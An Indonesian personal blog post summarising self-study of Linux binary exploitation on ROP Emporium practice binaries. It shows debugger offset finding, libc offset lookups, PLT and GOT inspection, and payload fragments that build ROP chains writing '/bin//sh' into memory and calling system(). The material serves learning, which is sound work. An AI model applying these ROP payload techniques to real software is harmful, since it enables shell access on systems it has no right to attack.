Не важно, как медленно ты продвигаешься, главное, что ты не останавливаешься.


Friday, 26 October 2018

Summary : Linux Binary Exploitation

Artikel ini merupakan ringkasan selama 2 minggu ini mencoba untuk mempelajari linux binary exploitation. Sebagai catatan pribadi yang mungkin berguna dikemudian hari. Seperti artikel sebelumnya, saya hanya mencoba apa yang dituliskan oleh orang lain, untuk memahami sedikit demi sedikit tentang linux binary exploitation. Berikut ini beberapa referensi yang dipakai dalam pembelajaran: 

https://github.com/nnamon/linux-exploitation-course
https://ropemporium.com/guide.html
https://github.com/abatchy17/ROP-Emporium

Linux Binary Protection

https://github.com/nnamon/linux-exploitation-course/blob/master/lessons/5_protections/lessonplan.md

# gdb ./write432
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3A\
AIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAm\
ARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ pattern offset 0x41414641 
1094796865 found at offset: 44
gdb-peda$ 
$ ldd callme
 linux-vdso.so.1 (0x00007fff306bd000)
 libcallme.so => ./libcallme.so (0x00007fd3c2179000)
 libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd3c1fa1000)
 /lib64/ld-linux-x86-64.so.2 (0x00007fd3c237d000)
https://github.com/niklasb/libc-database
$./add /lib/i386-linux-gnu/libc.so.6
$./dump local-0490256d1290b4c4fb59f37f9d3d87226d6500e6
offset___libc_start_main_ret = 0x199a1
offset_system = 0x0003d870
offset_dup2 = 0x000e6f60
offset_read = 0x000e6470
offset_write = 0x000e6540
offset_str_bin_sh = 0x17c968
# r2 -d write432

[0xf7f7d250]> aaa
[0xf7f7d250]> afl
0x080483c0    3 35           sym._init
0x08048400    1 6            sym.imp.printf
0x08048410    1 6            sym.imp.fgets
0x08048420    1 6            sym.imp.puts
0x08048430    1 6            sym.imp.system
0x08048440    1 6            sym.imp.__libc_start_main
0x08048450    1 6            sym.imp.setvbuf
0x08048460    1 6            sym.imp.memset
0x08048470    1 6            sub.__gmon_start_470
0x08048480    1 33           entry0
0x080484b0    1 4            sym.__x86.get_pc_thunk.bx
0x080484c0    4 43           sym.deregister_tm_clones
0x080484f0    4 53           sym.register_tm_clones
0x08048530    3 30           sym.__do_global_dtors_aux
0x08048550    4 43   -> 40   entry1.init
0x0804857b    1 123          sym.main
0x080485f6    1 86           sym.pwnme
0x0804864c    1 25           sym.usefulFunction
0x08048680    4 93           sym.__libc_csu_init
0x080486e0    1 2            sym.__libc_csu_fini
0x080486e4    1 20           sym._fini
# objdump -d write432 -j .plt

08048430 :
 8048430: ff 25 18 a0 04 08     jmp    *0x804a018
 8048436: 68 18 00 00 00        push   $0x18
 804843b: e9 b0 ff ff ff        jmp    80483f0 <.plt>
# readelf --relocs write432

Relocation section '.rel.dyn' at offset 0x368 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000506 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000a05 R_386_COPY        0804a040   stderr@GLIBC_2.0
0804a060  00000c05 R_386_COPY        0804a060   stdin@GLIBC_2.0
0804a064  00000905 R_386_COPY        0804a064   stdout@GLIBC_2.0

Relocation section '.rel.plt' at offset 0x388 contains 7 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf@GLIBC_2.0
0804a010  00000207 R_386_JUMP_SLOT   00000000   fgets@GLIBC_2.0
0804a014  00000307 R_386_JUMP_SLOT   00000000   puts@GLIBC_2.0
0804a018  00000407 R_386_JUMP_SLOT   00000000   system@GLIBC_2.0
0804a01c  00000607 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0
0804a020  00000707 R_386_JUMP_SLOT   00000000   setvbuf@GLIBC_2.0
0804a024  00000807 R_386_JUMP_SLOT   00000000   memset@GLIBC_2.0
# rabin2 -S write432
23 0x00000ffc     4 0x08049ffc     4 -rw- .got
24 0x00001000    40 0x0804a000    40 -rw- .got.plt
25 0x00001028     8 0x0804a028     8 -rw- .data
26 0x00001030     0 0x0804a040    44 -rw- .bss
32bit
#write /bin to ebp 4byte
payload += p32(pop_edi_ebp)
payload += p32(data_segment)
payload += '/bin'
payload += p32(mov_edi_ebp)
64bit
#write 8byte /bin/sh\x00
payload += p64(pop_r14_r15)
payload += p64(data_segment)
payload += '/bin//sh'
payload += p64(mov_r14_r15)
32bit system() ROP
#call system
payload += p32(system_plt)
payload += p32(0xdeadbeef)
payload += p32(data_segment)
64bit system() ROP
#call system
payload += p64(pop_rdi)
payload += p64(data_segment)
payload += p64(system_plt)
ROPgadget / ropper
$ ROPgadget --binary 1_staticnx  --ropchain
$ ropper --file ../Downloads/1_staticnx --chain execve --badbytes 000a0d

5 λ .: Summary : Linux Binary Exploitation Artikel ini merupakan ringkasan selama 2 minggu ini mencoba untuk mempelajari linux binary exploitation. Sebagai catatan pribadi yang mungk...

No comments:

Post a Comment

< >